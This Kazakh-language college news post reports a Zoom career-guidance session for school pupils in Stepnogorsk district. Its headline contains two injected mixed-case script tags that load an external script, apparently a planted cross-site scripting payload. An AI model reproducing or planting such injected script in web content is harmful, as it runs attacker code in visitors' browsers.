КӘСІБИ БАҒДАР БЕРУ ЖҰМЫСТАРЫ ЖАЛҒАСУДА<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.04.2024
📌Ағымдағы жылдың 18 сәуір күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжі «Тіл және әдебиет» кафедрасының оқытушылары Абиева Камила Қойшыбайқызы мен Қайыржан Тілек Сағындыққызы кәсіптік бағдар беру жоспарына сәйкес «Zoom» конференциясын өткізді. Степногорск ауданына қарасты Ю.А.Гагарин атындағы №7 орта мектебінің 9-10 сынып оқушыларына мамандықты дұрыс таңдау жасауына бағыт беру мақсатында кәсіби бағдар беру жұмыстарын ұйымдастырды. Конференция барысында колледж жайында бейнефильм көрсетіліп, мамандықтар бойынша толық ақпарат берілді. Тәрбие жұмысы негізінде ұйымдастырылатын элективті курстар, үйірмелер туралы мағлұматтар берілді. Кері байланыс орнатылып, оқушылар өздерін қызықтырған сұрақтарына жауап алды.
Просмотров: 406


Пікір қосу



Деректерді қолтаңбаға қосу